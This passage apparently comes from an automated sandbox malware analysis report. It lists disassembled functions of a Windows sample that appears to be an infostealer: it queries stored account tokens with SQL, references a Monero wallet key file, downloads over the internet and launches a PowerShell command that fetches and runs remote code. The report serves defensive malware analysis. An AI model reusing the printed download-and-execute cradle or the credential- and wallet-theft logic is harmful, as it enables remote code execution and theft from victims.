                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 0054BCCD
                                • lstrlen.KERNEL32(00000000), ref: 0054BDA5
                                • lstrlen.KERNEL32(00000000), ref: 0054BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                                • Instruction ID: f3ebce9368cd3ddcef560f9fb02de06f0e249f32f023b29952cbf51ef4b0d7cd
                                • Opcode Fuzzy Hash: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                                • Instruction Fuzzy Hash: 9CB156719101099BDB04FBA0CC6ADEE7B38BF94301F50465AF907A7191EF346A4DCB66
                                Function 00556770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                                • Instruction ID: 1168a108d440578a3b88352e1a1992de71763d29cb89d12ad09c8206e86b6754
                                • Opcode Fuzzy Hash: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                                • Instruction Fuzzy Hash: 71F0893098424AFFE3449FE0E91972C7B70FB08703F24419AF60587290D67C4B41EB9A
                                Function 00544FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00544FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00544FD1
                                • InternetOpenA.WININET(00560DDF,00000000,00000000,00000000,00000000), ref: 00544FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00545011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00545041
                                • InternetCloseHandle.WININET(?), ref: 005450B9
                                • InternetCloseHandle.WININET(?), ref: 005450C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 14b93b89c704b20a5db66c955d43b35479480c3615276025fc218688b853a63a
                                • Instruction ID: 7ceff9be6c0b5af00cae24bcba74e450db591df8759604d835fa0d7855237fb7
                                • Opcode Fuzzy Hash: 14b93b89c704b20a5db66c955d43b35479480c3615276025fc218688b853a63a
                                • Instruction Fuzzy Hash: 0431E7B4A40218ABDB20CF54DC89BDDBBB4FB48704F5081D9EA09A7281D7746E858F99
                                Function 005583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                                • wsprintfA.USER32 ref: 00558459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0107F3A8,00000000,000F003F,?,00000400), ref: 005584EC
                                • lstrlen.KERNEL32(?), ref: 00558501
                                • RegQueryValueExA.ADVAPI32(00000000,0107F360,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00560B34), ref: 00558599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00558608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0055861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                                • Instruction ID: 771b677b6ea2fe72d8ad1349b6ce3bf187fe8077ce4a3b2c10e13faffa7866a9
                                • Opcode Fuzzy Hash: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                                • Instruction Fuzzy Hash: 14217C7194021CABEB24DB54CC84FE9B7B8FB48700F10C1D9E609A6140DF74AA85CFE4
                                Function 00557690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005576AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0106D468,00000000,00020119,00000000), ref: 005576DD
                                • RegQueryValueExA.ADVAPI32(00000000,0107F288,00000000,00000000,?,000000FF), ref: 005576FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00557708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                                • Instruction ID: 608aabfbea9ddaaab5bbc92660ad53ed3c26a568b9e027c14e1f19f51b2f1a3f
                                • Opcode Fuzzy Hash: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                                • Instruction Fuzzy Hash: 150144B5A44308BBEB00DBE4EC59F6D7BB8EB48701F208456FE05D7190D67899048B55
                                Function 00557720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0055773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0106D468,00000000,00020119,005576B9), ref: 0055775B
                                • RegQueryValueExA.ADVAPI32(005576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0055777A
                                • RegCloseKey.ADVAPI32(005576B9), ref: 00557784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                                • Instruction ID: 292d2f52c82b46fda7cd745e4ecb21fef52fd798bb7d2d9fa0c603b26a19de2c
                                • Opcode Fuzzy Hash: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                                • Instruction Fuzzy Hash: 9B0117B5A40308BBEB00DBE4DC49FAEBBB8FB48701F108556FA05A7291DA7455048B65
                                Function 005592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(:U,80000000,00000003,00000000,00000003,00000080,00000000,?,00553AEE,?), ref: 005592FC
                                • GetFileSizeEx.KERNEL32(000000FF,:U), ref: 00559319
                                • CloseHandle.KERNEL32(000000FF), ref: 00559327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :U$:U
                                • API String ID: 1378416451-4244293621
                                • Opcode ID: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                                • Instruction ID: cfee92aecded88b162ce08e39543b465e4ee8bd36b1d6ad090f4dc942507a950
                                • Opcode Fuzzy Hash: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                                • Instruction Fuzzy Hash: 5DF0AF74E40208FBEB10DFB4DC18F9E7BB9FB48311F21CA55BA11A72C0D67896009B44
                                Function 005499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                                • LocalFree.KERNEL32(0054148F), ref: 00549A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                                • Instruction ID: a57ad703dd1ff59bce20c082efda804b174ce4f8819002a61e2aa5c29e7e9215
                                • Opcode Fuzzy Hash: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                                • Instruction Fuzzy Hash: A7312D74A00209EFDB14CF95C986BEE7BB5FF48345F208159E911A7290D778A941CFA1
                                Function 00554780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,0107ECE8), ref: 005547DB
                                  • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00554801
                                • lstrcat.KERNEL32(?,?), ref: 00554820
                                • lstrcat.KERNEL32(?,?), ref: 00554834
                                • lstrcat.KERNEL32(?,0106C9D0), ref: 00554847
                                • lstrcat.KERNEL32(?,?), ref: 0055485B
                                • lstrcat.KERNEL32(?,0107E918), ref: 0055486F
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                                  • Part of subcall function 00554570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                                  • Part of subcall function 00554570: RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                                  • Part of subcall function 00554570: wsprintfA.USER32 ref: 005545A6
                                  • Part of subcall function 00554570: FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                                • Instruction ID: 917364238f3c4f99cafae1a2679d49ade54b1f4138dbc749ce9fe54ff895cede
                                • Opcode Fuzzy Hash: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                                • Instruction Fuzzy Hash: 2E3173B294020967DB10FBB0DC99EE9777CBB88701F40458AB715A6081EE7897CD8FA5
                                Function 00552C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00552D85
                                Strings
                                • <, xrefs: 00552D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00552D04
                                • ')", xrefs: 00552CB3
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00552CC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
